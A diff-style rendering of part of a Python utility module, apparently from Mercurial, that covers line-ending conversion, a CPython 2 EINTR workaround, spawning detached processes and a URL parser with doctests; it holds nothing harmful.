2624
2623
2625 def tolf(s):
2624 def tolf(s):
2626 return _eolre.sub('\n', s)
2625 return _eolre.sub('\n', s)
2627
2626
2628 def tocrlf(s):
2627 def tocrlf(s):
2629 return _eolre.sub('\r\n', s)
2628 return _eolre.sub('\r\n', s)
2630
2629
2631 def _crlfwriter(fp):
2630 def _crlfwriter(fp):
2632 return transformingwriter(fp, tocrlf)
2631 return transformingwriter(fp, tocrlf)
2633
2632
2634 if pycompat.oslinesep == '\r\n':
2633 if pycompat.oslinesep == '\r\n':
2635 tonativeeol = tocrlf
2634 tonativeeol = tocrlf
2636 fromnativeeol = tolf
2635 fromnativeeol = tolf
2637 nativeeolwriter = _crlfwriter
2636 nativeeolwriter = _crlfwriter
2638 else:
2637 else:
2639 tonativeeol = pycompat.identity
2638 tonativeeol = pycompat.identity
2640 fromnativeeol = pycompat.identity
2639 fromnativeeol = pycompat.identity
2641 nativeeolwriter = pycompat.identity
2640 nativeeolwriter = pycompat.identity
2642
2641
2643 if (pyplatform.python_implementation() == 'CPython' and
2642 if (pyplatform.python_implementation() == 'CPython' and
2644 sys.version_info < (3, 0)):
2643 sys.version_info < (3, 0)):
2645 # There is an issue in CPython that some IO methods do not handle EINTR
2644 # There is an issue in CPython that some IO methods do not handle EINTR
2646 # correctly. The following table shows what CPython version (and functions)
2645 # correctly. The following table shows what CPython version (and functions)
2647 # are affected (buggy: has the EINTR bug, okay: otherwise):
2646 # are affected (buggy: has the EINTR bug, okay: otherwise):
2648 #
2647 #
2649 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2648 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2650 # --------------------------------------------------
2649 # --------------------------------------------------
2651 # fp.__iter__ | buggy | buggy | okay
2650 # fp.__iter__ | buggy | buggy | okay
2652 # fp.read* | buggy | okay [1] | okay
2651 # fp.read* | buggy | okay [1] | okay
2653 #
2652 #
2654 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2653 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2655 #
2654 #
2656 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2655 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2657 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2656 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2658 #
2657 #
2659 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2658 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2660 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2659 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2661 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2660 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2662 # fp.__iter__ but not other fp.read* methods.
2661 # fp.__iter__ but not other fp.read* methods.
2663 #
2662 #
2664 # On modern systems like Linux, the "read" syscall cannot be interrupted
2663 # On modern systems like Linux, the "read" syscall cannot be interrupted
2665 # when reading "fast" files like on-disk files. So the EINTR issue only
2664 # when reading "fast" files like on-disk files. So the EINTR issue only
2666 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2665 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2667 # files approximately as "fast" files and use the fast (unsafe) code path,
2666 # files approximately as "fast" files and use the fast (unsafe) code path,
2668 # to minimize the performance impact.
2667 # to minimize the performance impact.
2669 if sys.version_info >= (2, 7, 4):
2668 if sys.version_info >= (2, 7, 4):
2670 # fp.readline deals with EINTR correctly, use it as a workaround.
2669 # fp.readline deals with EINTR correctly, use it as a workaround.
2671 def _safeiterfile(fp):
2670 def _safeiterfile(fp):
2672 return iter(fp.readline, '')
2671 return iter(fp.readline, '')
2673 else:
2672 else:
2674 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2673 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2675 # note: this may block longer than necessary because of bufsize.
2674 # note: this may block longer than necessary because of bufsize.
2676 def _safeiterfile(fp, bufsize=4096):
2675 def _safeiterfile(fp, bufsize=4096):
2677 fd = fp.fileno()
2676 fd = fp.fileno()
2678 line = ''
2677 line = ''
2679 while True:
2678 while True:
2680 try:
2679 try:
2681 buf = os.read(fd, bufsize)
2680 buf = os.read(fd, bufsize)
2682 except OSError as ex:
2681 except OSError as ex:
2683 # os.read only raises EINTR before any data is read
2682 # os.read only raises EINTR before any data is read
2684 if ex.errno == errno.EINTR:
2683 if ex.errno == errno.EINTR:
2685 continue
2684 continue
2686 else:
2685 else:
2687 raise
2686 raise
2688 line += buf
2687 line += buf
2689 if '\n' in buf:
2688 if '\n' in buf:
2690 splitted = line.splitlines(True)
2689 splitted = line.splitlines(True)
2691 line = ''
2690 line = ''
2692 for l in splitted:
2691 for l in splitted:
2693 if l[-1] == '\n':
2692 if l[-1] == '\n':
2694 yield l
2693 yield l
2695 else:
2694 else:
2696 line = l
2695 line = l
2697 if not buf:
2696 if not buf:
2698 break
2697 break
2699 if line:
2698 if line:
2700 yield line
2699 yield line
2701
2700
2702 def iterfile(fp):
2701 def iterfile(fp):
2703 fastpath = True
2702 fastpath = True
2704 if type(fp) is file:
2703 if type(fp) is file:
2705 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2704 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2706 if fastpath:
2705 if fastpath:
2707 return fp
2706 return fp
2708 else:
2707 else:
2709 return _safeiterfile(fp)
2708 return _safeiterfile(fp)
2710 else:
2709 else:
2711 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2710 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2712 def iterfile(fp):
2711 def iterfile(fp):
2713 return fp
2712 return fp
2714
2713
2715 def iterlines(iterator):
2714 def iterlines(iterator):
2716 for chunk in iterator:
2715 for chunk in iterator:
2717 for line in chunk.splitlines():
2716 for line in chunk.splitlines():
2718 yield line
2717 yield line
2719
2718
2720 def expandpath(path):
2719 def expandpath(path):
2721 return os.path.expanduser(os.path.expandvars(path))
2720 return os.path.expanduser(os.path.expandvars(path))
2722
2721
2723 def hgcmd():
2722 def hgcmd():
2724 """Return the command used to execute current hg
2723 """Return the command used to execute current hg
2725
2724
2726 This is different from hgexecutable() because on Windows we want
2725 This is different from hgexecutable() because on Windows we want
2727 to avoid things opening new shell windows like batch files, so we
2726 to avoid things opening new shell windows like batch files, so we
2728 get either the python call or current executable.
2727 get either the python call or current executable.
2729 """
2728 """
2730 if mainfrozen():
2729 if mainfrozen():
2731 if getattr(sys, 'frozen', None) == 'macosx_app':
2730 if getattr(sys, 'frozen', None) == 'macosx_app':
2732 # Env variable set by py2app
2731 # Env variable set by py2app
2733 return [encoding.environ['EXECUTABLEPATH']]
2732 return [encoding.environ['EXECUTABLEPATH']]
2734 else:
2733 else:
2735 return [pycompat.sysexecutable]
2734 return [pycompat.sysexecutable]
2736 return gethgcmd()
2735 return gethgcmd()
2737
2736
2738 def rundetached(args, condfn):
2737 def rundetached(args, condfn):
2739 """Execute the argument list in a detached process.
2738 """Execute the argument list in a detached process.
2740
2739
2741 condfn is a callable which is called repeatedly and should return
2740 condfn is a callable which is called repeatedly and should return
2742 True once the child process is known to have started successfully.
2741 True once the child process is known to have started successfully.
2743 At this point, the child process PID is returned. If the child
2742 At this point, the child process PID is returned. If the child
2744 process fails to start or finishes before condfn() evaluates to
2743 process fails to start or finishes before condfn() evaluates to
2745 True, return -1.
2744 True, return -1.
2746 """
2745 """
2747 # Windows case is easier because the child process is either
2746 # Windows case is easier because the child process is either
2748 # successfully starting and validating the condition or exiting
2747 # successfully starting and validating the condition or exiting
2749 # on failure. We just poll on its PID. On Unix, if the child
2748 # on failure. We just poll on its PID. On Unix, if the child
2750 # process fails to start, it will be left in a zombie state until
2749 # process fails to start, it will be left in a zombie state until
2751 # the parent wait on it, which we cannot do since we expect a long
2750 # the parent wait on it, which we cannot do since we expect a long
2752 # running process on success. Instead we listen for SIGCHLD telling
2751 # running process on success. Instead we listen for SIGCHLD telling
2753 # us our child process terminated.
2752 # us our child process terminated.
2754 terminated = set()
2753 terminated = set()
2755 def handler(signum, frame):
2754 def handler(signum, frame):
2756 terminated.add(os.wait())
2755 terminated.add(os.wait())
2757 prevhandler = None
2756 prevhandler = None
2758 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2757 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2759 if SIGCHLD is not None:
2758 if SIGCHLD is not None:
2760 prevhandler = signal.signal(SIGCHLD, handler)
2759 prevhandler = signal.signal(SIGCHLD, handler)
2761 try:
2760 try:
2762 pid = spawndetached(args)
2761 pid = spawndetached(args)
2763 while not condfn():
2762 while not condfn():
2764 if ((pid in terminated or not testpid(pid))
2763 if ((pid in terminated or not testpid(pid))
2765 and not condfn()):
2764 and not condfn()):
2766 return -1
2765 return -1
2767 time.sleep(0.1)
2766 time.sleep(0.1)
2768 return pid
2767 return pid
2769 finally:
2768 finally:
2770 if prevhandler is not None:
2769 if prevhandler is not None:
2771 signal.signal(signal.SIGCHLD, prevhandler)
2770 signal.signal(signal.SIGCHLD, prevhandler)
2772
2771
2773 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2772 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2774 """Return the result of interpolating items in the mapping into string s.
2773 """Return the result of interpolating items in the mapping into string s.
2775
2774
2776 prefix is a single character string, or a two character string with
2775 prefix is a single character string, or a two character string with
2777 a backslash as the first character if the prefix needs to be escaped in
2776 a backslash as the first character if the prefix needs to be escaped in
2778 a regular expression.
2777 a regular expression.
2779
2778
2780 fn is an optional function that will be applied to the replacement text
2779 fn is an optional function that will be applied to the replacement text
2781 just before replacement.
2780 just before replacement.
2782
2781
2783 escape_prefix is an optional flag that allows using doubled prefix for
2782 escape_prefix is an optional flag that allows using doubled prefix for
2784 its escaping.
2783 its escaping.
2785 """
2784 """
2786 fn = fn or (lambda s: s)
2785 fn = fn or (lambda s: s)
2787 patterns = '|'.join(mapping.keys())
2786 patterns = '|'.join(mapping.keys())
2788 if escape_prefix:
2787 if escape_prefix:
2789 patterns += '|' + prefix
2788 patterns += '|' + prefix
2790 if len(prefix) > 1:
2789 if len(prefix) > 1:
2791 prefix_char = prefix[1:]
2790 prefix_char = prefix[1:]
2792 else:
2791 else:
2793 prefix_char = prefix
2792 prefix_char = prefix
2794 mapping[prefix_char] = prefix_char
2793 mapping[prefix_char] = prefix_char
2795 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2794 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2796 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2795 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2797
2796
2798 def getport(port):
2797 def getport(port):
2799 """Return the port for a given network service.
2798 """Return the port for a given network service.
2800
2799
2801 If port is an integer, it's returned as is. If it's a string, it's
2800 If port is an integer, it's returned as is. If it's a string, it's
2802 looked up using socket.getservbyname(). If there's no matching
2801 looked up using socket.getservbyname(). If there's no matching
2803 service, error.Abort is raised.
2802 service, error.Abort is raised.
2804 """
2803 """
2805 try:
2804 try:
2806 return int(port)
2805 return int(port)
2807 except ValueError:
2806 except ValueError:
2808 pass
2807 pass
2809
2808
2810 try:
2809 try:
2811 return socket.getservbyname(pycompat.sysstr(port))
2810 return socket.getservbyname(pycompat.sysstr(port))
2812 except socket.error:
2811 except socket.error:
2813 raise Abort(_("no port number associated with service '%s'") % port)
2812 raise Abort(_("no port number associated with service '%s'") % port)
2814
2813
2815 class url(object):
2814 class url(object):
2816 r"""Reliable URL parser.
2815 r"""Reliable URL parser.
2817
2816
2818 This parses URLs and provides attributes for the following
2817 This parses URLs and provides attributes for the following
2819 components:
2818 components:
2820
2819
2821 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2820 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2822
2821
2823 Missing components are set to None. The only exception is
2822 Missing components are set to None. The only exception is
2824 fragment, which is set to '' if present but empty.
2823 fragment, which is set to '' if present but empty.
2825
2824
2826 If parsefragment is False, fragment is included in query. If
2825 If parsefragment is False, fragment is included in query. If
2827 parsequery is False, query is included in path. If both are
2826 parsequery is False, query is included in path. If both are
2828 False, both fragment and query are included in path.
2827 False, both fragment and query are included in path.
2829
2828
2830 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2829 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2831
2830
2832 Note that for backward compatibility reasons, bundle URLs do not
2831 Note that for backward compatibility reasons, bundle URLs do not
2833 take host names. That means 'bundle://../' has a path of '../'.
2832 take host names. That means 'bundle://../' has a path of '../'.
2834
2833
2835 Examples:
2834 Examples:
2836
2835
2837 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2836 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2838 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2837 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2839 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2838 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2840 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2839 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2841 >>> url(b'file:///home/joe/repo')
2840 >>> url(b'file:///home/joe/repo')
2842 <url scheme: 'file', path: '/home/joe/repo'>
2841 <url scheme: 'file', path: '/home/joe/repo'>
2843 >>> url(b'file:///c:/temp/foo/')
2842 >>> url(b'file:///c:/temp/foo/')
2844 <url scheme: 'file', path: 'c:/temp/foo/'>
2843 <url scheme: 'file', path: 'c:/temp/foo/'>
2845 >>> url(b'bundle:foo')
2844 >>> url(b'bundle:foo')
2846 <url scheme: 'bundle', path: 'foo'>
2845 <url scheme: 'bundle', path: 'foo'>
2847 >>> url(b'bundle://../foo')
2846 >>> url(b'bundle://../foo')
2848 <url scheme: 'bundle', path: '../foo'>
2847 <url scheme: 'bundle', path: '../foo'>
2849 >>> url(br'c:\foo\bar')
2848 >>> url(br'c:\foo\bar')
2850 <url path: 'c:\\foo\\bar'>
2849 <url path: 'c:\\foo\\bar'>
2851 >>> url(br'\\blah\blah\blah')
2850 >>> url(br'\\blah\blah\blah')
2852 <url path: '\\\\blah\\blah\\blah'>
2851 <url path: '\\\\blah\\blah\\blah'>
2853 >>> url(br'\\blah\blah\blah#baz')
2852 >>> url(br'\\blah\blah\blah#baz')
2854 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2853 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2855 >>> url(br'file:///C:\users\me')
2854 >>> url(br'file:///C:\users\me')
2856 <url scheme: 'file', path: 'C:\\users\\me'>
2855 <url scheme: 'file', path: 'C:\\users\\me'>
2857
2856
2858 Authentication credentials:
2857 Authentication credentials:
2859
2858
2860 >>> url(b'ssh://joe:xyz@x/repo')
2859 >>> url(b'ssh://joe:xyz@x/repo')
2861 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2860 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2862 >>> url(b'ssh://joe@x/repo')
2861 >>> url(b'ssh://joe@x/repo')
2863 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2862 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2864
2863
2865 Query strings and fragments:
2864 Query strings and fragments:
2866
2865
2867 >>> url(b'http://host/a?b#c')
2866 >>> url(b'http://host/a?b#c')
2868 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2867 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2869 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2868 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2870 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2869 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2871
2870
2872 Empty path:
2871 Empty path:
2873
2872
2874 >>> url(b'')
2873 >>> url(b'')
2875 <url path: ''>
2874 <url path: ''>
2876 >>> url(b'#a')
2875 >>> url(b'#a')
2877 <url path: '', fragment: 'a'>
2876 <url path: '', fragment: 'a'>
2878 >>> url(b'http://host/')
2877 >>> url(b'http://host/')
2879 <url scheme: 'http', host: 'host', path: ''>
2878 <url scheme: 'http', host: 'host', path: ''>
2880 >>> url(b'http://host/#a')
2879 >>> url(b'http://host/#a')
2881 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2880 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2882
2881
2883 Only scheme:
2882 Only scheme:
2884
2883
2885 >>> url(b'http:')
2884 >>> url(b'http:')
2886 <url scheme: 'http'>
2885 <url scheme: 'http'>
2887 """
2886 """
2888
2887
2889 _safechars = "!~*'()+"
2888 _safechars = "!~*'()+"
2890 _safepchars = "/!~*'()+:\\"
2889 _safepchars = "/!~*'()+:\\"
2891 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2890 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2892
2891
2893 def __init__(self, path, parsequery=True, parsefragment=True):
2892 def __init__(self, path, parsequery=True, parsefragment=True):
2894 # We slowly chomp away at path until we have only the path left
2893 # We slowly chomp away at path until we have only the path left
2895 self.scheme = self.user = self.passwd = self.host = None
2894 self.scheme = self.user = self.passwd = self.host = None
2896 self.port = self.path = self.query = self.fragment = None
2895 self.port = self.path = self.query = self.fragment = None
2897 self._localpath = True
2896 self._localpath = True
2898 self._hostport = ''
2897 self._hostport = ''
2899 self._origpath = path
2898 self._origpath = path
2900
2899
2901 if parsefragment and '#' in path:
2900 if parsefragment and '#' in path:
2902 path, self.fragment = path.split('#', 1)
2901 path, self.fragment = path.split('#', 1)
2903
2902
2904 # special case for Windows drive letters and UNC paths
2903 # special case for Windows drive letters and UNC paths
2905 if hasdriveletter(path) or path.startswith('\\\\'):
2904 if hasdriveletter(path) or path.startswith('\\\\'):
2906 self.path = path
2905 self.path = path
2907 return
2906 return
2908
2907
2909 # For compatibility reasons, we can't handle bundle paths as
2908 # For compatibility reasons, we can't handle bundle paths as
2910 # normal URLS
2909 # normal URLS
2911 if path.startswith('bundle:'):
2910 if path.startswith('bundle:'):
2912 self.scheme = 'bundle'
2911 self.scheme = 'bundle'
2913 path = path[7:]
2912 path = path[7:]
2914 if path.startswith('//'):
2913 if path.startswith('//'):
2915 path = path[2:]
2914 path = path[2:]
2916 self.path = path
2915 self.path = path
2917 return
2916 return
2918
2917
2919 if self._matchscheme(path):
2918 if self._matchscheme(path):
2920 parts = path.split(':', 1)
2919 parts = path.split(':', 1)
2921 if parts[0]:
2920 if parts[0]:
2922 self.scheme, path = parts
2921 self.scheme, path = parts
2923 self._localpath = False
2922 self._localpath = False
2924
2923
2925 if not path:
2924 if not path:
2926 path = None
2925 path = None
2927 if self._localpath:
2926 if self._localpath:
2928 self.path = ''
2927 self.path = ''
2929 return
2928 return
2930 else:
2929 else:
2931 if self._localpath:
2930 if self._localpath:
2932 self.path = path
2931 self.path = path
2933 return
2932 return
2934
2933
2935 if parsequery and '?' in path:
2934 if parsequery and '?' in path:
2936 path, self.query = path.split('?', 1)
2935 path, self.query = path.split('?', 1)
2937 if not path:
2936 if not path:
2938 path = None
2937 path = None
2939 if not self.query:
2938 if not self.query:
2940 self.query = None
2939 self.query = None
2941
2940
2942 # // is required to specify a host/authority
2941 # // is required to specify a host/authority
2943 if path and path.startswith('//'):
2942 if path and path.startswith('//'):
2944 parts = path[2:].split('/', 1)
2943 parts = path[2:].split('/', 1)
2945 if len(parts) > 1:
2944 if len(parts) > 1:
2946 self.host, path = parts
2945 self.host, path = parts
2947 else:
2946 else:
2948 self.host = parts[0]
2947 self.host = parts[0]
2949 path = None
2948 path = None
2950 if not self.host:
2949 if not self.host:
2951 self.host = None
2950 self.host = None
2952 # path of file:///d is /d
2951 # path of file:///d is /d
2953 # path of file:///d:/ is d:/, not /d:/
2952 # path of file:///d:/ is d:/, not /d:/
2954 if path and not hasdriveletter(path):
2953 if path and not hasdriveletter(path):
2955 path = '/' + path
2954 path = '/' + path
2956
2955
2957 if self.host and '@' in self.host:
2956 if self.host and '@' in self.host:
2958 self.user, self.host = self.host.rsplit('@', 1)
2957 self.user, self.host = self.host.rsplit('@', 1)
2959 if ':' in self.user:
2958 if ':' in self.user:
2960 self.user, self.passwd = self.user.split(':', 1)
2959 self.user, self.passwd = self.user.split(':', 1)
2961 if not self.host:
2960 if not self.host:
2962 self.host = None
2961 self.host = None
2963
2962
2964 # Don't split on colons in IPv6 addresses without ports
2963 # Don't split on colons in IPv6 addresses without ports
2965 if (self.host and ':' in self.host and
2964 if (self.host and ':' in self.host and
2966 not (self.host.startswith('[') and self.host.endswith(']'))):
2965 not (self.host.startswith('[') and self.host.endswith(']'))):
2967 self._hostport = self.host
2966 self._hostport = self.host
2968 self.host, self.port = self.host.rsplit(':', 1)
2967 self.host, self.port = self.host.rsplit(':', 1)
2969 if not self.host:
2968 if not self.host:
2970 self.host = None
2969 self.host = None
2971
2970
2972 if (self.host and self.scheme == 'file' and
2971 if (self.host and self.scheme == 'file' and
2973 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2972 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2974 raise Abort(_('file:// URLs can only refer to localhost'))
2973 raise Abort(_('file:// URLs can only refer to localhost'))
2975
2974
2976 self.path = path
2975 self.path = path
2977
2976
2978 # leave the query string escaped
2977 # leave the query string escaped
2979 for a in ('user', 'passwd', 'host', 'port',
2978 for a in ('user', 'passwd', 'host', 'port',
2980 'path', 'fragment'):
2979 'path', 'fragment'):
2981 v = getattr(self, a)
2980 v = getattr(self, a)
2982 if v is not None:
2981 if v is not None:
2983 setattr(self, a, urlreq.unquote(v))
2982 setattr(self, a, urlreq.unquote(v))
2984
2983
2985 @encoding.strmethod
2984 @encoding.strmethod
2986 def __repr__(self):
2985 def __repr__(self):
2987 attrs = []
2986 attrs = []
2988 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2987 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2989 'query', 'fragment'):
2988 'query', 'fragment'):
2990 v = getattr(self, a)
2989 v = getattr(self, a)
2991 if v is not None:
2990 if v is not None:
2992 attrs.append('%s: %r' % (a, v))
2991 attrs.append('%s: %r' % (a, v))
2993 return '<url %s>' % ', '.join(attrs)
2992 return '<url %s>' % ', '.join(attrs)
2994
2993
2995 def __bytes__(self):
2994 def __bytes__(self):
2996 r"""Join the URL's components back into a URL string.
2995 r"""Join the URL's components back into a URL string.
2997
2996
2998 Examples:
2997 Examples:
2999
2998
3000 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2999 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3001 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3000 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3002 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3001 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3003 'http://user:pw@host:80/?foo=bar&baz=42'
3002 'http://user:pw@host:80/?foo=bar&baz=42'
3004 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3003 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3005 'http://user:pw@host:80/?foo=bar%3dbaz'
3004 'http://user:pw@host:80/?foo=bar%3dbaz'
3006 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3005 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3007 'ssh://user:pw@[::1]:2200//home/joe#'
3006 'ssh://user:pw@[::1]:2200//home/joe#'
3008 >>> bytes(url(b'http://localhost:80//'))
3007 >>> bytes(url(b'http://localhost:80//'))
3009 'http://localhost:80//'
3008 'http://localhost:80//'
3010 >>> bytes(url(b'http://localhost:80/'))
3009 >>> bytes(url(b'http://localhost:80/'))
3011 'http://localhost:80/'
3010 'http://localhost:80/'
3012 >>> bytes(url(b'http://localhost:80'))
3011 >>> bytes(url(b'http://localhost:80'))
3013 'http://localhost:80/'
3012 'http://localhost:80/'
3014 >>> bytes(url(b'bundle:foo'))
3013 >>> bytes(url(b'bundle:foo'))
3015 'bundle:foo'
3014 'bundle:foo'
3016 >>> bytes(url(b'bundle://../foo'))
3015 >>> bytes(url(b'bundle://../foo'))
3017 'bundle:../foo'
3016 'bundle:../foo'
3018 >>> bytes(url(b'path'))
3017 >>> bytes(url(b'path'))
3019 'path'
3018 'path'
3020 >>> bytes(url(b'file:///tmp/foo/bar'))
3019 >>> bytes(url(b'file:///tmp/foo/bar'))
3021 'file:///tmp/foo/bar'
3020 'file:///tmp/foo/bar'
3022 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3021 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3023 'file:///c:/tmp/foo/bar'
3022 'file:///c:/tmp/foo/bar'
3024 >>> print(url(br'bundle:foo\bar'))
3023 >>> print(url(br'bundle:foo\bar'))
3025 bundle:foo\bar
3024 bundle:foo\bar
3026 >>> print(url(br'file:///D:\data\hg'))
3025 >>> print(url(br'file:///D:\data\hg'))
3027 file:///D:\data\hg
3026 file:///D:\data\hg
3028 """
3027 """
3029 if self._localpath:
3028 if self._localpath:
3030 s = self.path
3029 s = self.path
3031 if self.scheme == 'bundle':
3030 if self.scheme == 'bundle':
3032 s = 'bundle:' + s
3031 s = 'bundle:' + s
3033 if self.fragment:
3032 if self.fragment:
3034 s += '#' + self.fragment
3033 s += '#' + self.fragment
3035 return s
3034 return s
3036
3035
3037 s = self.scheme + ':'
3036 s = self.scheme + ':'
3038 if self.user or self.passwd or self.host:
3037 if self.user or self.passwd or self.host:
3039 s += '//'
3038 s += '//'
3040 elif self.scheme and (not self.path or self.path.startswith('/')
3039 elif self.scheme and (not self.path or self.path.startswith('/')
3041 or hasdriveletter(self.path)):
3040 or hasdriveletter(self.path)):
3042 s += '//'
3041 s += '//'
3043 if hasdriveletter(self.path):
3042 if hasdriveletter(self.path):
3044 s += '/'
3043 s += '/'
3045 if self.user:
3044 if self.user:
3046 s += urlreq.quote(self.user, safe=self._safechars)
3045 s += urlreq.quote(self.user, safe=self._safechars)
3047 if self.passwd:
3046 if self.passwd:
3048 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3047 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3049 if self.user or self.passwd:
3048 if self.user or self.passwd:
3050 s += '@'
3049 s += '@'
3051 if self.host:
3050 if self.host:
3052 if not (self.host.startswith('[') and self.host.endswith(']')):
3051 if not (self.host.startswith('[') and self.host.endswith(']')):
3053 s += urlreq.quote(self.host)
3052 s += urlreq.quote(self.host)
3054 else:
3053 else:
3055 s += self.host
3054 s += self.host
3056 if self.port:
3055 if self.port:
3057 s += ':' + urlreq.quote(self.port)
3056 s += ':' + urlreq.quote(self.port)
3058 if self.host:
3057 if self.host:
3059 s += '/'
3058 s += '/'
3060 if self.path:
3059 if self.path:
3061 # TODO: similar to the query string, we should not unescape the
3060 # TODO: similar to the query string, we should not unescape the
3062 # path when we store it, the path might contain '%2f' = '/',
3061 # path when we store it, the path might contain '%2f' = '/',
3063 # which we should *not* escape.
3062 # which we should *not* escape.
3064 s += urlreq.quote(self.path, safe=self._safepchars)
3063 s += urlreq.quote(self.path, safe=self._safepchars)
3065 if self.query:
3064 if self.query:
3066 # we store the query in escaped form.
3065 # we store the query in escaped form.
3067 s += '?' + self.query
3066 s += '?' + self.query
3068 if self.fragment is not None:
3067 if self.fragment is not None:
3069 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3068 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3070 return s
3069 return s
3071
3070
3072 __str__ = encoding.strmethod(__bytes__)
3071 __str__ = encoding.strmethod(__bytes__)
3073
3072
3074 def authinfo(self):
3073 def authinfo(self):
3075 user, passwd = self.user, self.passwd
3074 user, passwd = self.user, self.passwd
3076 try:
3075 try:
3077 self.user, self.passwd = None, None
3076 self.user, self.passwd = None, None
3078 s = bytes(self)
3077 s = bytes(self)
3079 finally:
3078 finally:
3080 self.user, self.passwd = user, passwd
3079 self.user, self.passwd = user, passwd
3081 if not self.user:
3080 if not self.user:
3082 return (s, None)
3081 return (s, None)
3083 # authinfo[1] is passed to urllib2 password manager, and its
3082 # authinfo[1] is passed to urllib2 password manager, and its
3084 # URIs must not contain credentials. The host is passed in the
3083 # URIs must not contain credentials. The host is passed in the
3085 # URIs list because Python < 2.4.3 uses only that to search for
3084 # URIs list because Python < 2.4.3 uses only that to search for
3086 # a password.
3085 # a password.
3087 return (s, (None, (s, self.host),
3086 return (s, (None, (s, self.host),
3088 self.user, self.passwd or ''))
3087 self.user, self.passwd or ''))
3089
3088
3090 def isabs(self):
3089 def isabs(self):
3091 if self.scheme and self.scheme != 'file':
3090 if self.scheme and self.scheme != 'file':
3092 return True # remote URL
3091 return True # remote URL
3093 if hasdriveletter(self.path):
3092 if hasdriveletter(self.path):
3094 return True # absolute for our purposes - can't be joined()
3093 return True # absolute for our purposes - can't be joined()
3095 if self.path.startswith(br'\\'):
3094 if self.path.startswith(br'\\'):
3096 return True # Windows UNC path
3095 return True # Windows UNC path
3097 if self.path.startswith('/'):
3096 if self.path.startswith('/'):
3098 return True # POSIX-style
3097 return True # POSIX-style
3099 return False
3098 return False
3100
3099
3101 def localpath(self):
3100 def localpath(self):
